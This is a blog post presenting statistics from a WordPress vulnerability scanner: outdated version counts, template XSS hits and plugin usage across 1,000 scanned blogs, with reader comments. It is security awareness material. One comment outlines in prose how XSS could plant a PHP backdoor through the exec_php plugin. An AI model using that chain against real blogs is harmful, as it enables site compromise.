Although, wp-scanner online is still in its infant stages, the results of these tests are certainly eye opening. You’ll see that a large percentage of WordPress blogs are vulnerable to atleast one known attack that may allow an attacker to compromise the website and more then likely the web server.
Around this time last month, BlogSecurity launched a version check of 50 popular WordPress blogs. We found that 49 of the 50 blogs were potentially vulnerable to attacks due to their use of an older version of WordPress (more details here).
After releasing BlogSecurity’s WordPress Vulnerability scanner online last week, we have already had over 1000 blogs use our scanner to test themselves.
Currently wp-scanner supports 3 main test areas:
- WordPress hardening and version control
- WordPress Template XSS vulnerabilities
- WordPress plugin enumeration
The results are as follows:
WordPress Version Checks
| WordPress Ver | Blogs Affected |
| 1.2 | 2 |
| 1.2.2 | 1 |
| 1.5 | 6 |
| 1.5.2 | 19 |
| 2.0 | 3 |
| 2.0.1 | 7 |
| 2.0.2 | 13 |
| 2.0.3 | 7 |
| 2.0.4 | 24 |
| 2.0.5 | 18 |
| 2.0.6 | 5 |
| 2.0.7 | 23 |
| 2.0.8 | 4 |
| 2.0.9 | 11 |
| 2.0.10 | 28 |
| 2.1 | 33 |
| 2.1.1 | 9 |
| 2.1.2 | 46 |
| 2.1.3 | 86 |
| 2.2 | 212 |
| 2.2.1 | 387 |
| 2.2.2 | 1 |
| 2.3-alpha | 2 |
| Unknown | 53 |
| Total | 1000 |
WordPress Template XSS Checks
| XSS Test | Blogs Affected |
| XSS 1 - Tests Template Search Facility | 180 |
| XSS 2 - Tests for PHP_SELF and others (type 1) | 126 |
| XSS 3 - Tests for PHP_SELF and others (type 2) | 275 |
| Total | 581 |
WordPress Plugins Vulnerabilities
This table uses BlogSecurity’s BlogWatch to determine vulnerable plugins.
| Plugin found | Vulnerable According to BlogWatch | Vulnerability |
| Adsense | 121 | XSS |
| Akismet with WordPress <=2.1.3 | See WordPress Version Checks | XSS |
Future version of wp-scanner will allow for better testing in this area; however, the tests currently are limited to enumeration only.
Plugins Used
This is a list of plugins enumerated and their usage listed by popularity ascending:
| Plugin found | Usage |
| ultimate_tag_warrior | 44 |
| teb-super-archive | 45 |
| feedstats | 46 |
| sem-fancy-excerpt | 47 |
| wpPaginate-v2 | 47 |
| Adsense-deluxe-v0.8 | 52 |
| Mime | 53 |
| wp-notable | 53 |
| srg-archives | 56 |
| gravatars | 68 |
| flickrrss | 76 |
| podpress | 88 |
| wp-lightbox2 | 88 |
| permalink_redirect | 92 |
| pxsmail | 92 |
| Adsense-deluxe | 121 |
| exec_php | 138 |
| related_posts | 144 |
| wp-cache2 | 181 |
| wp-contact-form | 195 |
| get-recent-comments | 205 |
| sitemap | 212 |
| subscribe-to-comments | 263 |
| Hello Dolly | 698 |
| timezone | 434 |
| wp-backup | 596 |
| Akismet | 847 |
Summary
We know a number of people already know about these problems, but I think this makes it blatently apparent, that development and thought processes around WordPress update services and a plugin/template version control system are critical as part of securing future WordPress installations.
Comments
I’ve been looking into these stats as well and to me it is quite scary to see how many people out there don’t even know about the security problems their blogs face today. Give the fact the blogs are medium for mass communication I believe that it is a quite important thing to secure them as much as possible.
Everyone, check usage number of exec_php! This plugin allows you to embed PHP code inside your posts. Although it may seem quite convenient, it is a big security problem. Given the fact that most blogs have XSS in one form or another, all attackers need to do is to trick the user into visiting a malicious page. Upon arrival the malicious JavaScript code will inject a PHP backdoor within some of the posts. After that, the attacker will be able to compromise the entire wordpress installation. This is not good.
pdp, from the plugin list, you can easily see which plugins an attacker may target first couldn’t you.. it was definately an interesting excercise.
I would say that the real disaster isn’t this list or the result it displays, it’s just the peak of the iceberg in my eyes. As just persons let check their blogs, because they’re curious about their security and so found or followed a link to this website. Imaging how many people will be out there who don’t even think about security issues and therefore never will check their blog here. So I’m afraid that it’s in real quite more critical.
But another point does the scanner count just the number of calls or the unique addresses? Because I used it 2 times, to check my versions 2.2 and 2.2.1? I’m guessing you use the addresses as just these handle correct data for a diagram(No double entries).
Btw: Thank you David for your great work and for these real interesting posts. Keep up the good work!
[…] zum Thema, eine aktuelle Statistik der letzten 1000 Wordpress Scanns. Die Ergebnisse, man achte auf die Versionen, sprechen wohl […]
Phil, the statistics do not include re-tests. The results are only on first tests.
I think your points about people who use wp-scanner will most likely be those interested in security… hopefully BlogSecurity will encourage others to follow. Nice points as usual Phil.
[…] Version Survey A while ago I saw the blog version survey at BlogSecurity.net and got an idea to do my own. The previous survey is more than 8 months old and […]
@David,
That is not the spirit of the post. The main idea is that popular blogs do not run security checks or upgrades.
@Phil,
This is a great post and a great blog! :) Makes things very accessible for clients to read.
-
Search site:
-
Additional WP Resources
